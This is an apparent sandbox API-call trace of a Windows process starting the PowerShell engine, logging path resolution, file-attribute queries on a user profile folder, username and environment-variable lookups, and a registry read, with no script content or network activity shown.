	[0224.038] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.038] SetErrorMode (uMode=0x1) returned 0x1
	[0224.038] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.038] SetErrorMode (uMode=0x1) returned 0x1
	[0224.038] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.038] SetErrorMode (uMode=0x1) returned 0x1
	[0224.038] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1ad270, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.038] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.038] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.038] SetErrorMode (uMode=0x1) returned 0x1
	[0224.038] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.039] SetErrorMode (uMode=0x1) returned 0x1
	[0224.039] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.039] SetErrorMode (uMode=0x1) returned 0x1
	[0224.039] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1ad470 | out: lpFileInformation=0x1ad470*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.039] SetErrorMode (uMode=0x1) returned 0x1
	[0224.039] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad270, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.039] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x1ad160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.039] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.039] SetErrorMode (uMode=0x1) returned 0x1
	[0224.039] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0224.040] SetErrorMode (uMode=0x1) returned 0x1
	[0224.040] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.040] SetErrorMode (uMode=0x1) returned 0x1
	[0224.040] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0224.040] SetErrorMode (uMode=0x1) returned 0x1
	[0224.040] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.040] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1ad1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0224.040] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.040] SetErrorMode (uMode=0x1) returned 0x1
	[0224.040] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.040] SetErrorMode (uMode=0x1) returned 0x1
	[0224.040] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.041] SetErrorMode (uMode=0x1) returned 0x1
	[0224.041] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.041] SetErrorMode (uMode=0x1) returned 0x1
	[0224.041] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.041] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x1ad1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0224.041] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.041] SetErrorMode (uMode=0x1) returned 0x1
	[0224.041] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.041] SetErrorMode (uMode=0x1) returned 0x1
	[0224.041] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.041] SetErrorMode (uMode=0x1) returned 0x1
	[0224.041] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1ad4b0 | out: lpFileInformation=0x1ad4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.041] SetErrorMode (uMode=0x1) returned 0x1
	[0224.041] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.042] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x1ad1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.048] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad510, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.049] SetErrorMode (uMode=0x1) returned 0x1
	[0224.049] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1ad770 | out: lpFileInformation=0x1ad770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.049] SetErrorMode (uMode=0x1) returned 0x1
	[0224.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.868] CoTaskMemAlloc (cb=0x804) returned 0x1b375ae0
	[0230.868] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b375ae0, nSize=0x1adad8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1adad8) returned 0x1
	[0231.475] CoTaskMemFree (pv=0x1b375ae0) 
	[0231.475] CoTaskMemAlloc (cb=0x204) returned 0x256de0
	[0231.476] GetUserNameW (in: lpBuffer=0x256de0, pcbBuffer=0x1adb18 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1adb18) returned 1
	[0231.476] CoTaskMemFree (pv=0x256de0) 
	[0231.478] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc0540*="Available", lpRawData=0x2dc02d0) returned 1
	[0232.146] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0232.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.146] CoTaskMemFree (pv=0x204160) 
	[0232.147] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0232.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.147] CoTaskMemFree (pv=0x204160) 
	[0232.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.153] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0232.153] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0232.153] CoTaskMemFree (pv=0x204160) 
	[0232.153] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0232.153] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0232.154] CoTaskMemFree (pv=0x204160) 
	[0232.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.155] GetCurrentProcessId () returned 0x310
	[0232.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.159] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adaf8 | out: phkResult=0x1adaf8*=0x344) returned 0x0
	[0232.159] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ada7c, lpData=0x0, lpcbData=0x1ada78*=0x0 | out: lpType=0x1ada7c*=0x1, lpData=0x0, lpcbData=0x1ada78*=0x56) returned 0x0
	[0232.159] CoTaskMemAlloc (cb=0x5a) returned 0x1b368cf0
